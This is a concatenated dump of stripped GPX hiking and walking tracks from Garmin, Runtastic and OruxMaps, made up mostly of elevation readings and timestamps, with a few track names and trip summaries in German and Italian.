+2015-10-13T09:09:18Z
+
+
+968.0
+2015-10-13T09:14:59Z
+
+
+971.59
+2015-10-13T09:15:47Z
+
+
+972.41
+2015-10-13T09:16:06Z
+
+
+982.82
+2015-10-13T09:21:08Z
+
+
+994.66
+2015-10-13T09:23:23Z
+
+
+1006.44
+2015-10-13T09:24:25Z
+
+
+1005.85
+2015-10-13T09:25:30Z
+
+
+1002.44
+2015-10-13T09:26:11Z
+
+
+996.0
+2015-10-13T09:27:10Z
+
+
+988.92
+2015-10-13T09:27:48Z
+
+
+982.76
+2015-10-13T09:28:22Z
+
+
+975.37
+2015-10-13T09:29:10Z
+
+
+960.01
+2015-10-13T09:30:27Z
+
+
+951.97
+2015-10-13T09:31:35Z
+
+
+950.18
+2015-10-13T09:31:49Z
+
+
+945.4
+2015-10-13T09:32:27Z
+
+
+944.48
+2015-10-13T09:32:41Z
+
+
+929.3
+2015-10-13T09:35:31Z
+
+
+921.48
+2015-10-13T09:37:08Z
+
+
+918.88
+2015-10-13T09:37:51Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+Blössling ( 1310m ) & Schweinekopf ( 1285m ) - I -
+
+
+
+2016
+http://www.runtastic.com
+
+runtastic
+2016-03-31T10:56:18Z
+
+
+Um deine Aktivitäten anzusehen gehe auf Runtastic.com
+
+
+996.5399780273438
+2016-03-31T09:56:18Z
+
+
+1007.1199951171875
+2016-03-31T10:01:18Z
+
+
+1013.3699951171875
+2016-03-31T10:02:18Z
+
+
+1020.0999755859375
+2016-03-31T10:03:18Z
+
+
+1030.18994140625
+2016-03-31T10:04:48Z
+
+
+1047.489990234375
+2016-03-31T10:07:48Z
+
+
+1078.260009765625
+2016-03-31T10:14:18Z
+
+
+1082.5799560546875
+2016-03-31T10:14:48Z
+
+
+1090.27001953125
+2016-03-31T10:15:48Z
+
+
+1096.52001953125
+2016-03-31T10:18:18Z
+
+
+1099.8900146484375
+2016-03-31T10:18:48Z
+
+
+1111.4200439453125
+2016-03-31T10:21:48Z
+
+
+1120.0699462890625
+2016-03-31T10:23:48Z
+
+
+1129.68994140625
+2016-03-31T10:25:48Z
+
+
+1138.8199462890625
+2016-03-31T10:27:48Z
+
+
+1150.8399658203125
+2016-03-31T10:30:18Z
+
+
+1166.219970703125
+2016-03-31T10:33:48Z
+
+
+1184.47998046875
+2016-03-31T10:38:18Z
+
+
+1204.6700439453125
+2016-03-31T10:43:18Z
+
+
+1215.719970703125
+2016-03-31T10:47:18Z
+
+
+1240.719970703125
+2016-03-31T10:52:18Z
+
+
+1255.1400146484375
+2016-03-31T10:59:18Z
+
+
+1281.0899658203125
+2016-03-31T11:07:18Z
+
+
+1291.6700439453125
+2016-03-31T11:11:18Z
+
+
+1310.9000244140625
+2016-03-31T11:17:18Z
+
+
+1312.3399658203125
+2016-03-31T11:43:18Z
+
+
+1310.9000244140625
+2016-03-31T11:43:48Z
+
+
+1293.1099853515625
+2016-03-31T11:45:48Z
+
+
+1271.9599609375
+2016-03-31T11:48:18Z
+
+
+1273.4000244140625
+2016-03-31T11:49:18Z
+
+
+1252.25
+2016-03-31T12:20:18Z
+
+
+1281.0899658203125
+2016-03-31T12:24:18Z
+
+
+1285.9000244140625
+2016-03-31T12:30:48Z
+
+
+1248.4100341796875
+2016-03-31T12:33:48Z
+
+
+1270.0400390625
+2016-03-31T12:37:48Z
+ "
+"
+
+
+Watt Wanderung
+
+Monika Teusch - Community
+
+
+
+2017-08-28T21:14:59Z
+
+Watt Wanderung
+27.8.2017
+
+
+
+4.30729
+
+
+2.43974
+
+
+2.62526
+
+
+1.90037
+
+
+0.63038
+
+
+0.64141
+
+
+0.73704
+
+
+0.29514
+
+
+-0.46422
+
+
+0.22492
+
+
+-0.83866
+
+
+-0.09655
+
+
+-0.55563
+
+
+0.16884
+
+
+-0.78317
+
+
+-1.05682
+
+
+-1.56804
+
+
+-1.56286
+
+
+-1.23764
+
+
+-1.52755
+
+
+-1.1218
+
+
+-0.97316
+
+
+-1.01328
+
+
+-0.6188
+
+
+-0.8376
+
+
+0.11065
+
+
+-0.62781
+
+
+0.51817
+
+
+-0.18716
+
+
+0.144
+
+
+-0.07296
+
+
+-0.15694
+
+
+-0.43482
+
+
+-0.38543
+
+
+-0.22099
+
+
+0.46299
+
+
+3.63285
+
+
+4.14947
+
+
+3.04924
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-08-18T04:59:36Z
+
+
+749 Hängebrücke Val Meltger
+
+
+
+
+
+
+1347.1849
+
+
+1335.01108
+
+
+1327.60305
+
+
+1325.96565
+
+
+1321.99455
+
+
+1314.57798
+
+
+1311.68823
+
+
+1302.97071
+
+
+1305.22122
+
+
+1319.26292
+
+
+1331.03655
+
+
+1346.25138
+
+
+1357.29288
+
+
+1365.02325
+
+
+1380.13769
+
+
+1404.15719
+
+
+1415.52709
+
+
+1427.76581
+
+
+1428.98134
+
+
+1453.33901
+
+
+1446.26081
+
+
+1459.1141
+
+
+1472.55408
+
+
+1483.06518
+
+
+1490.69633
+
+
+1502.15222
+
+
+1518.81354
+
+
+1517.81167
+
+
+1521.38968
+
+
+1533.16311
+
+
+1541.53187
+
+
+1553.02775
+
+
+1555.22474
+
+
+1538.26695
+
+
+1576.93501
+
+
+1574.94622
+
+
+1570.52911
+
+
+1565.48797
+
+
+1570.32858
+
+
+1549.09939
+
+
+1547.32773
+
+
+1547.32773
+
+
+1516.52249
+
+
+1516.52249
+
+
+1528.13106
+
+
+1546.52192
+
+
+1560.29996
+
+
+1564.19011
+
+
+1578.0217
+
+
+1587.56583
+
+
+1594.75983
+
+
+1604.37918
+
+
+1609.01972
+
+
+1622.94833
+
+
+1632.43502
+
+
+1649.7542
+
+
+1628.12851
+
+
+1627.36978
+
+
+1618.7966
+
+
+1619.41281
+
+
+1609.18891
+
+
+1602.28485
+
+
+1575.12958
+
+
+1568.94424
+
+
+1565.45059
+
+
+1551.51665
+
+
+1539.89477
+
+
+1539.89477
+
+
+1524.72925
+
+
+1519.43886
+
+
+1514.8253
+
+
+1502.9662
+
+
+1491.07515
+
+
+1464.28897
+
+
+1467.93495
+
+
+1446.92132
+
+
+1422.2558
+
+
+1418.58673
+
+
+1410.91744
+
+
+1389.64004
+
+
+1381.65861
+
+
+1375.37514
+
+
+1367.09757
+
+
+1362.31493
+
+
+1349.05422
+
+
+1348.3
+ "
+"
+
+
+
+
+
+
+Garmin International
+2017-08-08T09:04:03Z
+
+
+Track
+
+
+
+
+
+
+2538.63
+2017-08-07T11:59:58Z
+
+
+2535.89
+2017-08-07T12:03:57Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-01-18T19:39:32Z
+
+
+Aktueller Track: 29 NOV 2014 10:25
+
+
+
+
+
+
+561.0546875
+
+
+558.9296875
+
+
+557.4765625
+
+
+552.05859375
+
+
+539.44
+2014-11-29T09:26:25Z
+
+
+537.51
+2014-11-29T09:28:52Z
+
+
+528.38
+2014-11-29T09:32:46Z
+
+
+527.9
+2014-11-29T09:35:36Z
+
+
+528.38
+2014-11-29T09:36:11Z
+
+
+528.86
+2014-11-29T09:36:19Z
+
+
+528.86
+2014-11-29T09:37:27Z
+
+
+529.34
+2014-11-29T09:38:03Z
+
+
+530.79
+2014-11-29T09:39:16Z
+
+
+532.71
+2014-11-29T09:41:15Z
+
+
+529.34
+2014-11-29T09:47:53Z
+
+
+533.19
+2014-11-29T09:50:08Z
+
+
+535.11
+2014-11-29T09:52:26Z
+
+
+535.11
+2014-11-29T09:53:27Z
+
+
+530.3
+2014-11-29T09:57:17Z
+
+
+530.79
+2014-11-29T09:58:44Z
+
+
+529.82
+2014-11-29T09:59:23Z
+
+
+529.82
+2014-11-29T10:00:12Z
+
+
+531.27
+2014-11-29T10:01:57Z
+
+
+537.03
+2014-11-29T10:04:16Z
+
+
+538.96
+2014-11-29T10:05:19Z
+
+
+540.4
+2014-11-29T10:06:36Z
+
+
+538.48
+2014-11-29T10:07:46Z
+
+
+539.44
+2014-11-29T10:12:48Z
+
+
+539.92
+2014-11-29T10:14:23Z
+
+
+539.44
+2014-11-29T10:15:05Z
+
+
+539.92
+2014-11-29T10:15:25Z
+
+
+539.92
+2014-11-29T10:16:39Z
+
+
+541.36
+2014-11-29T10:17:31Z
+
+
+550.97
+2014-11-29T10:20:26Z
+
+
+551.93
+2014-11-29T10:21:02Z
+
+
+551.93
+2014-11-29T10:23:33Z
+
+
+551.45
+2014-11-29T10:25:45Z
+
+
+539.44
+2014-11-29T10:27:19Z
+
+
+536.55
+2014-11-29T10:27:58Z
+
+
+527.9
+2014-11-29T10:31:05Z
+
+
+525.02
+2014-11-29T10:33:18Z
+
+
+533.67
+2014-11-29T10:35:20Z
+
+
+542.32
+2014-11-29T10:38:29Z
+
+
+554.34
+2014-11-29T10:44:05Z
+
+
+530.79
+2014-11-29T10:46:46Z
+
+
+531.27
+2014-11-29T10:47:00Z
+
+
+532.71
+2014-11-29T10:47:51Z
+
+
+539.92
+2014-11-29T10:49:52Z
+
+
+541.84
+2014-11-29T10:50:20Z
+
+
+557.7
+2014-11-29T10:55:37Z
+
+
+569.24
+2014-11-29T10:59:31Z
+
+
+575.49
+2014-11-29T11:01:36Z
+
+
+575.01
+2014-11-29T11:01:58Z
+
+
+562.99
+2014-11-29T11:04:57Z
+
+
+558.66
+2014-11-29T11:07:33Z
+
+
+560.11
+2014-11-29T11:08:48Z
+
+
+561.07
+2014-11-29T11:13:01Z
+
+
+563.95
+2014-11-29T11:15:04Z
+
+
+565.39
+2014-11-29T11:17:30Z
+
+
+567.8
+2014-11-29T11:22:42Z
+
+
+562.51
+2014-11-29T11:25:07Z
+
+
+561.55
+2014-11-29T11:26:33Z
+
+
+563.47
+2014-11-29T11:27:40Z
+
+
+564.43
+2014-11-29T11:28:32Z
+ "
+"
+
+
+eremo san grato
+ 25/ago/2015 13:58:34
+
+
+1854.0
+2015-08-25T11:58:34Z
+
+1796.0
+2015-08-25T12:00:07Z
+
+1786.0
+2015-08-25T12:01:26Z
+
+1799.0
+2015-08-25T12:02:21Z
+
+1786.0
+2015-08-25T12:04:52Z
+
+1791.0
+2015-08-25T12:06:25Z
+
+1796.0
+2015-08-25T12:09:04Z
+
+1782.0
+2015-08-25T12:11:02Z
+
+1779.0
+2015-08-25T12:12:25Z
+
+1770.0
+2015-08-25T12:13:52Z
+
+1781.0
+2015-08-25T12:15:17Z
+
+1755.0
+2015-08-25T12:17:02Z
+
+1775.0
+2015-08-25T12:18:29Z
+
+1782.0
+2015-08-25T12:19:10Z
+
+1772.0
+2015-08-25T12:20:24Z
+
+1800.0
+2015-08-25T12:21:30Z
+
+1782.0
+2015-08-25T12:22:26Z
+
+1766.0
+2015-08-25T12:24:05Z
+
+1765.0
+2015-08-25T12:25:05Z
+
+1766.0
+2015-08-25T12:26:11Z
+
+1759.0
+2015-08-25T12:27:11Z "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+Jocau
+
+
+
+
+
+OruxMaps
+2016-06-09T10:21:24Z
+
+
+Jocau
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Jocau</h2><br /><p>Startzeit: 06/09/2016 12:20</p><p>Zielzeit: 06/09/2016 14:18</p><p>Strecke: 4,6km (01:57)</p><p>Bewegungszeit: 01:13</p><p>Ø-Geschwindigkeit: 2,3km/h</p><p>Netto-Geschwindigkeit: 3,7km/h</p><p>Max. Geschwindigkeit: 11,9km/h</p><p>Minimale Höhe: 1275m</p><p>Maximale Höhe: 2052m</p><p>Steig-Geschw.: 420,8m/h</p><p>Sink-Geschw.: -339,7m/h</p><p>Aufstieg: 784m</p><p>Abstieg: -15m</p><p>Steigzeit: 01:51</p><p>Sinkzeit: 00:02</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1275.59
+2016-06-09T10:20:59Z
+
+
+1296.93
+2016-06-09T10:23:36Z
+
+
+1317.07
+2016-06-09T10:26:29Z
+
+
+1322.45
+2016-06-09T10:27:26Z
+
+
+1331.23
+2016-06-09T10:28:15Z
+
+
+1341.17
+2016-06-09T10:29:05Z
+
+
+1349.43
+2016-06-09T10:29:45Z
+
+
+1366.02
+2016-06-09T10:32:29Z
+
+
+1410.7
+2016-06-09T10:38:37Z
+
+
+1436.54
+2016-06-09T10:40:18Z
+
+
+1458.56
+2016-06-09T10:42:37Z
+
+
+1458.96
+2016-06-09T10:43:05Z
+
+
+1467.7
+2016-06-09T10:44:07Z
+
+
+1466.75
+2016-06-09T10:44:53Z
+
+
+1471.55
+2016-06-09T10:45:23Z
+
+
+1481.55
+2016-06-09T10:48:01Z
+
+
+1481.56
+2016-06-09T10:48:23Z
+
+
+1480.65
+2016-06-09T10:48:55Z
+
+
+1485.08
+2016-06-09T10:49:43Z
+
+
+1478.06
+2016-06-09T10:50:55Z
+
+
+1497.55
+2016-06-09T10:53:14Z
+
+
+1519.39
+2016-06-09T10:56:04Z
+
+
+1538.01
+2016-06-09T10:59:27Z
+
+
+1592.2
+2016-06-09T11:06:33Z
+
+
+1602.53
+2016-06-09T11:08:40Z
+
+
+1626.18
+2016-06-09T11:11:56Z
+
+
+1655.04
+2016-06-09T11:15:09Z
+
+
+1658.14
+2016-06-09T11:16:24Z
+
+
+1701.61
+2016-06-09T11:30:49Z
+
+
+1715.08
+2016-06-09T11:33:29Z
+
+
+1730.91
+2016-06-09T11:34:44Z
+
+
+1756.47
+2016-06-09T11:39:02Z
+
+
+1778.08
+2016-06-09T11:40:50Z
+
+
+1828.27
+2016-06-09T11:48:32Z
+
+
+1838.38
+2016-06-09T11:50:06Z
+
+
+1840.55
+2016-06-09T11:51:18Z
+
+
+1863.71
+2016-06-09T11:53:49Z
+
+
+1890.52
+2016-06-09T11:56:40Z
+
+
+1879.38
+2016-06-09T11:57:07Z
+
+
+1907.42
+2016-06-09T11:57:37Z
+
+
+1928.8
+2016-06-09T12:00:26Z
+
+
+1969.75
+2016-06-09T12:05:12Z
+
+
+2016.05
+2016-06-09T12:13:52Z
+
+
+2048.05
+2016-06-09T12:18:26Z
+ "
+"
+
+
+
+
+
+
+
+2014-07-19T06:53:37Z
+
+
+
+1087.0
+2014-07-19T06:53:37Z
+
+
+1089.4000244
+2014-07-19T06:54:08Z
+
+
+1108.8000488
+2014-07-19T06:56:27Z
+
+
+1113.4000244
+2014-07-19T06:57:17Z
+
+
+1112.8000488
+2014-07-19T06:57:53Z
+
+
+1108.1999512
+2014-07-19T06:59:34Z
+
+
+1104.0
+2014-07-19T07:01:14Z
+
+
+1106.8000488
+2014-07-19T07:02:16Z
+
+
+1113.0
+2014-07-19T07:04:21Z
+
+
+1127.8000488
+2014-07-19T07:08:07Z
+
+
+1131.0
+2014-07-19T07:08:36Z
+
+
+1133.8000488
+2014-07-19T07:09:00Z
+
+
+1138.5999756
+2014-07-19T07:09:48Z
+
+
+1148.0
+2014-07-19T07:11:19Z
+
+
+1153.8000488
+2014-07-19T07:12:39Z
+
+
+1175.1999512
+2014-07-19T07:15:56Z
+
+
+1187.4000244
+2014-07-19T07:17:20Z
+
+
+1208.5999756
+2014-07-19T07:20:04Z
+
+
+1219.8000488
+2014-07-19T07:22:16Z
+
+
+1237.5999756
+2014-07-19T07:25:05Z
+
+
+1275.0
+2014-07-19T07:29:32Z
+
+
+1313.5999756
+2014-07-19T07:33:49Z
+
+
+1327.0
+2014-07-19T07:35:16Z
+
+
+1342.0
+2014-07-19T07:36:44Z
+
+
+1352.1999512
+2014-07-19T07:38:07Z
+
+
+1370.1999512
+2014-07-19T07:41:44Z
+
+
+1373.0
+2014-07-19T07:42:22Z
+
+
+1370.5999756
+2014-07-19T07:43:03Z
+
+
+1367.1999512
+2014-07-19T07:43:49Z
+
+
+1357.8000488
+2014-07-19T07:45:14Z
+
+
+1357.0
+2014-07-19T07:45:37Z
+
+
+1361.0
+2014-07-19T07:46:04Z
+
+
+1371.0
+2014-07-19T07:47:07Z
+
+
+1379.8000488
+2014-07-19T07:48:02Z
+
+
+1391.5999756
+2014-07-19T07:49:32Z
+
+
+1382.5999756
+2014-07-19T07:51:04Z
+
+
+1377.1999512
+2014-07-19T07:51:29Z
+
+
+1380.8000488
+2014-07-19T07:55:13Z
+
+
+1384.5999756
+2014-07-19T07:56:37Z
+
+
+1382.5999756
+2014-07-19T07:57:04Z
+
+
+1380.4000244
+2014-07-19T07:58:53Z
+
+
+1384.1999512
+2014-07-19T08:07:09Z
+
+
+1388.1999512
+2014-07-19T08:07:55Z
+
+
+1409.5999756
+2014-07-19T08:10:43Z
+
+
+1415.1999512
+2014-07-19T08:12:15Z
+
+
+1418.0
+2014-07-19T08:13:10Z
+
+
+1420.1999512
+2014-07-19T08:14:37Z
+
+
+1422.1999512
+2014-07-19T08:15:22Z
+
+
+1425.8000488
+2014-07-19T08:16:14Z
+
+
+1428.0
+2014-07-19T08:17:31Z
+
+
+1431.0
+2014-07-19T08:20:18Z
+
+
+1420.5999756
+2014-07-19T08:40:37Z
+
+
+1427.8000488
+2014-07-19T08:42:24Z
+
+
+1425.0
+2014-07-19T08:43:39Z
+
+
+1424.8000488
+2014-07-19T08:44:51Z
+
+
+1414.5999756
+2014-07-19T08:47:21Z
+
+
+1404.1999512
+2014-07-19T08:49:42Z
+
+
+1401.1999512
+2014-07-19T08:51:30Z
+
+
+1403.0
+2014-07-19T08:54:00Z
+
+
+1414.0
+2014-07-19T08:55:03Z
+
+
+1428.1999512
+2014-07-19T08:57:29Z
+
+
+1431.0
+2014-07-19T09:00:00Z
+ "
+"
+
+
+abstieg
+
+
+
+
+
+OruxMaps
+2015-06-29T15:14:56Z
+
+
+abstieg
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: abstieg</h2><br /><p>Startzeit: 06/29/2015 17:14</p><p>Zielzeit: 06/29/2015 19:52</p><p>Strecke: 7,8km (02:37)</p><p>Bewegungszeit: 01:48</p><p>Ø-Geschwindigkeit: 3km/h</p><p>Netto-Geschwindigkeit: 4,4km/h</p><p>Max. Geschwindigkeit: 7,8km/h</p><p>Minimale Höhe: 1894m</p><p>Maximale Höhe: 2681m</p><p>Steig-Geschw.: 263m/h</p><p>Sink-Geschw.: -453,4m/h</p><p>Aufstieg: 127m</p><p>Abstieg: -912m</p><p>Steigzeit: 00:29</p><p>Sinkzeit: 02:00</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+2681.1
+2015-06-29T15:14:58Z
+
+
+2677.63
+2015-06-29T15:17:48Z
+
+
+2629.2
+2015-06-29T15:23:09Z
+
+
+2560.26
+2015-06-29T15:27:45Z
+
+
+2534.6
+2015-06-29T15:31:14Z
+
+
+2492.89
+2015-06-29T15:36:30Z
+
+
+2482.46
+2015-06-29T15:37:57Z
+
+
+2486.03
+2015-06-29T15:38:18Z
+
+
+2484.1
+2015-06-29T15:41:08Z
+
+
+2461.92
+2015-06-29T15:42:55Z
+
+
+2409.97
+2015-06-29T15:50:13Z
+
+
+2309.0
+2015-06-29T16:08:45Z
+
+
+2294.63
+2015-06-29T16:12:50Z
+
+
+2228.72
+2015-06-29T16:18:49Z
+
+
+2193.73
+2015-06-29T16:22:47Z
+
+
+2083.48
+2015-06-29T16:33:15Z
+
+
+2101.5
+2015-06-29T16:35:11Z
+
+
+2107.6
+2015-06-29T16:40:05Z
+
+
+2121.57
+2015-06-29T16:43:08Z
+
+
+2139.46
+2015-06-29T16:46:22Z
+
+
+2148.13
+2015-06-29T16:51:43Z
+
+
+2124.1
+2015-06-29T16:56:37Z
+
+
+2116.46
+2015-06-29T16:59:03Z
+
+
+2116.03
+2015-06-29T17:00:12Z
+
+
+2107.06
+2015-06-29T17:02:31Z
+
+
+2087.79
+2015-06-29T17:04:18Z
+
+
+2075.13
+2015-06-29T17:06:17Z
+
+
+2072.18
+2015-06-29T17:08:52Z
+
+
+2069.99
+2015-06-29T17:10:36Z
+
+
+2073.11
+2015-06-29T17:11:21Z
+
+
+2071.72
+2015-06-29T17:11:51Z
+
+
+2048.22
+2015-06-29T17:14:58Z
+
+
+2041.25
+2015-06-29T17:17:02Z
+
+
+2044.6
+2015-06-29T17:17:51Z
+
+
+2051.1
+2015-06-29T17:19:01Z
+
+
+2059.6
+2015-06-29T17:20:28Z
+
+
+2069.09
+2015-06-29T17:23:59Z
+
+
+2073.09
+2015-06-29T17:28:56Z
+
+
+2073.59
+2015-06-29T17:30:11Z
+
+
+2062.72
+2015-06-29T17:32:13Z
+
+
+2054.6
+2015-06-29T17:33:34Z
+
+
+2038.73
+2015-06-29T17:35:11Z
+
+
+2035.47
+2015-06-29T17:35:25Z
+
+
+2005.97
+2015-06-29T17:38:22Z
+
+
+2001.6
+2015-06-29T17:40:04Z
+
+
+1981.1
+2015-06-29T17:43:05Z
+
+
+1969.22
+2015-06-29T17:44:03Z
+
+
+1949.1
+2015-06-29T17:46:27Z
+
+
+1936.22
+2015-06-29T17:47:16Z
+
+
+1917.72
+2015-06-29T17:49:31Z
+
+
+1903.04
+2015-06-29T17:50:47Z
+
+
+1894.61
+2015-06-29T17:52:46Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-03-17T18:22:57Z
+
+
+2014-03-16 16:38:18
+Data 16/03/2014, escursione leggera con Sara.
+Dall'Alpe Tedesco al Monte Minisfreddo passando per il Poncione di Ganna e viceversa (quasi tutto sullo stesso percorso, ma al ritorno non si è passati sulla vetta del Poncione).
+
+
+
+
+
+
+
+
+748.07
+2014-03-16T13:11:11Z
+
+
+758.15
+2014-03-16T13:14:18Z
+
+
+768.39
+2014-03-16T13:16:38Z
+
+
+796.5
+2014-03-16T13:20:08Z
+
+
+805.08
+2014-03-16T13:21:25Z
+
+
+822.99
+2014-03-16T13:23:16Z
+
+
+839.97
+2014-03-16T13:24:58Z
+
+
+870.48
+2014-03-16T13:31:04Z
+
+
+879.11
+2014-03-16T13:31:44Z
+
+
+901.75
+2014-03-16T13:33:43Z
+
+
+921.5
+2014-03-16T13:35:41Z
+
+
+988.96
+2014-03-16T13:46:36Z
+
+
+989.19
+2014-03-16T13:48:00Z
+
+
+982.64
+2014-03-16T13:59:09Z
+
+
+946.07
+2014-03-16T14:03:11Z
+
+
+918.58
+2014-03-16T14:09:39Z
+
+
+930.13
+2014-03-16T14:13:03Z
+
+
+945.97
+2014-03-16T14:14:59Z
+
+
+975.49
+2014-03-16T14:19:21Z
+
+
+977.91
+2014-03-16T14:20:58Z
+
+
+982.78
+2014-03-16T14:22:24Z
+
+
+1000.89
+2014-03-16T14:24:20Z
+
+
+1019.09
+2014-03-16T14:32:36Z
+
+
+1016.95
+2014-03-16T14:34:01Z
+
+
+1023.64
+2014-03-16T14:36:26Z
+
+
+1023.2
+2014-03-16T14:44:02Z
+
+
+1020.52
+2014-03-16T14:45:52Z
+
+
+1019.12
+2014-03-16T14:49:07Z
+
+
+1027.5
+2014-03-16T14:50:45Z
+
+
+1035.87
+2014-03-16T14:53:29Z
+
+
+1005.17
+2014-03-16T14:57:57Z
+
+
+983.74
+2014-03-16T15:00:14Z
+
+
+977.91
+2014-03-16T15:02:40Z
+
+
+946.58
+2014-03-16T15:06:23Z
+
+
+930.8
+2014-03-16T15:08:31Z
+
+
+920.01
+2014-03-16T15:11:42Z
+
+
+904.34
+2014-03-16T15:14:57Z
+
+
+899.07
+2014-03-16T15:16:24Z
+
+
+899.39
+2014-03-16T15:17:09Z
+
+
+898.69
+2014-03-16T15:17:36Z
+
+
+887.19
+2014-03-16T15:18:36Z
+
+
+884.4
+2014-03-16T15:19:11Z
+
+
+872.03
+2014-03-16T15:21:55Z
+
+
+867.96
+2014-03-16T15:22:35Z
+
+
+841.04
+2014-03-16T15:26:22Z
+
+
+826.27
+2014-03-16T15:27:13Z
+
+
+811.85
+2014-03-16T15:28:16Z
+
+
+799.99
+2014-03-16T15:29:15Z
+
+
+774.2
+2014-03-16T15:32:04Z
+
+
+759.63
+2014-03-16T15:33:38Z
+
+
+752.61
+2014-03-16T15:35:34Z
+
+
+748.35
+2014-03-16T15:36:27Z
+
+
+741.13
+2014-03-16T15:38:16Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-08-05T15:08:32Z
+
+
+Tracé actuel: 20 JUIL 2014 14:15 002 001
+
+
+
+
+
+
+15.609375
+2014-07-20T12:18:40Z
+
+
+25.25390625
+2014-07-20T12:24:49Z
+
+
+50.25
+2014-07-20T12:27:25Z
+
+
+72.96484375
+2014-07-20T12:29:45Z
+
+
+147.2578125
+2014-07-20T12:37:36Z
+
+
+159.18359375
+2014-07-20T12:43:24Z
+
+
+198.328125
+2014-07-20T12:46:26Z
+
+
+218.25390625
+2014-07-20T12:49:10Z
+
+
+231.76171875
+2014-07-20T12:51:05Z
+
+
+280.8984375
+2014-07-20T12:58:51Z
+
+
+293.3984375
+2014-07-20T13:01:54Z
+
+
+302.37109375
+2014-07-20T13:02:47Z
+
+
+301.84765625
+2014-07-20T13:03:50Z
+
+
+310.75390625
+2014-07-20T13:07:48Z
+
+
+321.546875
+2014-07-20T13:11:10Z
+
+
+322.26953125
+2014-07-20T13:27:23Z
+
+
+346.05859375
+2014-07-20T13:32:14Z
+
+
+347.10546875
+2014-07-20T13:33:10Z
+
+
+376.85546875
+2014-07-20T13:35:38Z
+
+
+403.515625
+2014-07-20T13:37:33Z
+
+
+414.20703125
+2014-07-20T13:38:18Z
+
+
+425.08984375
+2014-07-20T13:39:07Z
+
+
+432.12109375
+2014-07-20T13:39:41Z
+
+
+460.19921875
+2014-07-20T13:42:08Z
+
+
+475.86328125
+2014-07-20T13:43:26Z
+
+
+530.015625
+2014-07-20T13:48:12Z
+
+
+550.0703125
+2014-07-20T13:53:15Z
+
+
+559.6015625
+2014-07-20T13:55:18Z
+
+
+556.4453125
+2014-07-20T14:09:40Z
+
+
+578.0
+2014-07-20T14:23:58Z
+
+
+558.6796875
+2014-07-20T14:26:20Z
+
+
+530.6796875
+2014-07-20T14:27:59Z
+
+
+498.640625
+2014-07-20T14:29:36Z
+
+
+500.265625
+2014-07-20T14:29:58Z
+
+
+473.65625
+2014-07-20T14:30:57Z
+
+
+457.890625
+2014-07-20T14:32:05Z
+
+
+432.2109375
+2014-07-20T14:33:14Z
+
+
+424.0703125
+2014-07-20T14:33:51Z
+
+
+413.03125
+2014-07-20T14:34:21Z
+
+
+403.84765625
+2014-07-20T14:34:47Z
+
+
+377.2421875
+2014-07-20T14:36:23Z
+
+
+347.359375
+2014-07-20T14:37:56Z
+
+
+336.98046875
+2014-07-20T14:39:11Z
+
+
+323.53125
+2014-07-20T14:39:52Z
+
+
+322.2109375
+2014-07-20T14:40:50Z
+
+
+315.05859375
+2014-07-20T14:41:49Z
+
+
+312.59375
+2014-07-20T14:42:41Z
+
+
+302.265625
+2014-07-20T14:44:39Z
+
+
+295.1484375
+2014-07-20T14:45:38Z
+
+
+281.51171875
+2014-07-20T14:46:40Z
+
+
+237.875
+2014-07-20T14:49:04Z
+
+
+219.60546875
+2014-07-20T14:50:22Z
+
+
+195.4296875
+2014-07-20T14:51:04Z
+
+
+163.0703125
+2014-07-20T14:52:18Z
+
+
+157.09375
+2014-07-20T14:52:50Z
+
+
+145.578125
+2014-07-20T15:53:43Z
+
+
+75.4609375
+2014-07-20T15:58:23Z
+
+
+46.50390625
+2014-07-20T16:00:41Z
+
+
+15.86328125
+2014-07-20T16:06:19Z
+ "
+"
+
+
+Tourenplanung am 18. März 2017
+
+Holger Stein - Community
+
+
+
+2017-03-18T18:34:11Z
+
+Tourenplanung am 18. März 2017
+
+
+
+49.9
+
+
+50.2
+
+
+53.2
+
+
+31.4
+
+
+9.0
+
+
+14.1
+
+
+4.9
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+2016-06-07 12:32:41
+
+
+
+505.31
+
+
+508.19
+
+
+511.56
+
+
+521.17
+
+
+550.01
+
+
+566.83
+
+
+577.41
+
+
+588.95
+
+
+606.73
+
+
+620.19
+
+
+627.88
+
+
+659.12
+
+
+671.62
+
+
+683.15
+
+
+689.88
+
+
+696.13
+
+
+709.11
+
+
+716.32
+
+
+734.1
+
+
+750.45
+
+
+756.69
+
+
+763.42
+
+
+767.75
+
+
+784.57
+
+
+795.15
+
+
+806.68
+
+
+809.09
+
+
+822.06
+
+
+838.89
+
+
+848.5
+
+
+851.87
+
+
+855.71
+
+
+861.96
+
+
+864.84
+
+
+870.61
+
+
+883.11
+
+
+895.12
+
+
+909.54
+
+
+913.87
+
+
+953.28
